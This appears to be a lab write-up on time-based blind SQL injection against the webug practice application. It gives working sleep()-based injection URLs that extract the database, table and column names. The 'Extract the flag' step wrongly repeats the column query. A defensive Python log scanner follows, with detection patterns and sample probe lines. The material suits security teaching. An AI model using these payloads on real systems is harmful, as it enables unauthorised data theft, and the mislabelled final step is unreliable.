webug time-based (delay) injection
The SQL statement can be worked out from the earlier error output.
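Building a delay statement with the sleep() function makes the page respond late.
As with boolean injection, the database name, table names and other information are guessed by observing how the page responds.
Extract the current database name
http://192.168.199.143/control/sqlinject/bool_injection.php?id=1'and if(ascii(substr(database(),1,1))>118,1,sleep(5))%23
If the value is greater than 118, 1 is returned; otherwise sleep(5) is executed.
The current database name comes out as webug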

Enumerate the tables under webug
http://192.168.199.143/control/sqlinject/bool_injection.php?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='webug' limit 0,1),1,1))>99,1,sleep(5))%23
Tables found under webug: data_crud, env_list, env_path, flag, sqlinjection, user, user_test
The boolean-injection level already showed that the flag is in env_list, so go straight to the columns of env_list
http://192.168.199.143/control/sqlinject/bool_injection.php?id=1'and if(ascii(substr((select column_name from information_schema.columns where table_name='env_list' limit 0,1),1,1))>104,1,sleep(5))%23

The env_list table contains: id, envName, envDesc, envIntegration, delFlag, envFlag, level, type

Extract the flag
http://192.168.199.143/control/sqlinject/bool_injection.php?id=1'and if(ascii(substr((select column_name from information_schema.columns where table_name='env_list' limit 0,1),1,1))>104,1,sleep(5))%23
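
Seen from the server side, the requests above leave a clear trace: one client repeatedly hits the same script with a delay function wrapped in a conditional, and response times split into fast and roughly five-second groups. The following is an added example, not part of the original post, that flags this pattern in access logs; the log line format (ending in a response time in seconds), the client addresses and the thresholds are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# A delay primitive plus a conditional/extraction function in the same
# query string is the signature of time-based blind SQL injection.
DELAY = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay", re.I)
PROBE = re.compile(r"\b(if|ascii|ord|substr|substring|mid)\s*\(|information_schema", re.I)
# Assumed format: client "METHOD target PROTO" status seconds
LINE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" (\d{3}) ([\d.]+)$')

_P = "/control/sqlinject/bool_injection.php"
# Constructed sample log: two benign requests, then four probes shaped like
# the page's first request ('w' is ASCII 119, so >119 and >120 hit sleep).
SAMPLE_LOG = [
    f'10.0.0.5 "GET {_P}?id=1 HTTP/1.1" 200 0.011',
    '10.0.0.5 "GET /search.php?q=sleep+tips HTTP/1.1" 200 0.020',
] + [
    f'10.0.0.7 "GET {_P}?id=1%27%20and%20if(ascii(substr(database(),1,1))'
    f'%3E{n},1,sleep(5))%23 HTTP/1.1" 200 {t}'
    for n, t in [(100, "0.013"), (118, "0.014"), (119, "5.012"), (120, "5.011")]
]

def parse(line):
    """Return (client, path, decoded query, seconds), or None if unparsable."""
    m = LINE.match(line)
    if not m:
        return None
    client, _method, target, _status, secs = m.groups()
    parts = urlsplit(target)
    return client, parts.path, unquote_plus(parts.query), float(secs)

def find_time_based_probing(lines, min_hits=3, slow=4.0):
    """Map (client, path) -> counts of matching requests and slow responses."""
    stats = defaultdict(lambda: {"hits": 0, "slow": 0})
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        client, path, query, secs = rec
        if DELAY.search(query) and PROBE.search(query):
            entry = stats[(client, path)]
            entry["hits"] += 1
            # A slow reply means the delay ran: the parameter is injectable.
            entry["slow"] += int(secs >= slow)
    return {k: v for k, v in stats.items() if v["hits"] >= min_hits}

if __name__ == "__main__":
    for key, counts in find_time_based_probing(SAMPLE_LOG).items():
        print(key, counts)
```

A non-zero "slow" count matters most: it shows the database executed the delay, so the parameter should be fixed with a parameterized query rather than only filtered.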
